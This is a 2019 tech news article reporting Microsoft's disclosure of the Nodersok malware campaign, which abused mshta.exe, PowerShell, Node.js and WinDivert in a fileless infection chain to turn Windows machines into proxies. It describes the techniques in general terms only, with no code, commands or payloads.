View all newsletters
Receive our newsletter - data, insights and analysis delivered to you
  1. Technology
  2. Cybersecurity
September 27, 2019

Microsoft Warns Over Sophisticated, “Peculiar” New Malware using Node.js

Nodersok runs on node.exe, WinDivert; disables Windows Defender Antivirus

By CBR Staff Writer

Microsoft’s threat team has flagged an unusual flavour of malware, which is using an rare combination of techniques to fly under the radar of endpoint detection tools.

The campaign uses “two unusual legitimate tools” to run on infected machines, then relies on an “elusive network infrastructure” to turn them into zombie proxie.

The malware campaign, dubbed Nodersok, went through a “long chain of fileless techniques to install a pair of very peculiar tools” Microsoft said in a Thursday blog published by its ATP Research Team – including the popular Node.js framework.

It also disables (or tries to disable) Windows Defender Antivirus and Windows updates, and runs a binary shellcode that attempts elevation of privilege by using another legitimate Microsoft service; the Microsoft Connection Manager Profile Installer.

What’s so Unusual About Nodersok?

Nodersok, which uses the two legitimate tools to avoid detection, persist, and move laterally – a technique known as living-off-the-land binaries (LOLBins) – delivers Node.exe; the Windows implementation of the Node.js framework and WinDivert a network packet capture and manipulation utility to its target machines.

LOLBin-based malware is, in itself, now no novelty. But Nodersok went through a “long chain of fileless techniques” to install the “peculiar” tools, Microsoft said, and although malware using Node.js has been identified in the past, it remains rare.

(A detailed look at the attack chain can be found here).

Content from our partners
Scan and deliver
GenAI cybersecurity: "A super-human analyst, with a brain the size of a planet."
Cloud, AI, and cyber security – highlights from DTX Manchester
Nodersok, Microsoft

The complex Nodersok attack. Credit: Microsoft

The malware campaign initially went undetected, but Microsoft uncovered the campaign in mid-July, when suspicious patterns in the anomalous usage of MSHTA.exe emerged from Microsoft Defender ATP telemetry, its team said.

(MSHTA.exe is a utility that executes Microsoft HTML Applications).

LOLBins Approach Makes it Hard to Spot

Alarmingly for victims, every single step of the infection chain only runs legitimate LOLBins, either from the machine itself (mshta.exepowershell.exe) or downloaded third-party ones (node.exeWindivert.dll/sys).

This makes it nigh impossible for traditional signature-based detection defence techniques to catch it and stop it at the periphery.

As Microsoft’s APT team puts it: “All of the relevant functionalities reside in scripts and shellcodes that are almost always coming in encrypted, are then decrypted, and run while only in memory. No malicious executable is ever written to the disk.”

The attack appears to have been in its early stages, and while the technique to reach the destination is sophisticated, the payload code is “still in its infancy and in development” Microsoft said; adding that it hasn’t observed network requests coming from attackers

It’s the kind of attack that’s a poster child for AI/anomaly detection-based security software and the APT team was keen to emphasise the powers of its own Microsoft Defender APT product in helping identify the series of attacks  which primarily hit consumers in the US and Europe, but also professional services and finance customers.

See also:  The 5 Most Commonly Used Hacking Tools – and How to Defend Against Them



Websites in our network
Select and enter your corporate email address Tech Monitor's research, insight and analysis examines the frontiers of digital transformation to help tech leaders navigate the future. Our Changelog newsletter delivers our best work to your inbox every week.
  • CIO
  • CTO
  • CISO
  • CSO
  • CFO
  • CDO
  • CEO
  • Architect Founder
  • MD
  • Director
  • Manager
  • Other
Visit our privacy policy for more information about our services, how Progressive Media Investments may use, process and share your personal data, including information on your rights in respect of your personal data and how you can unsubscribe from future marketing communications. Our services are intended for corporate subscribers and you warrant that the email address submitted is your corporate email address.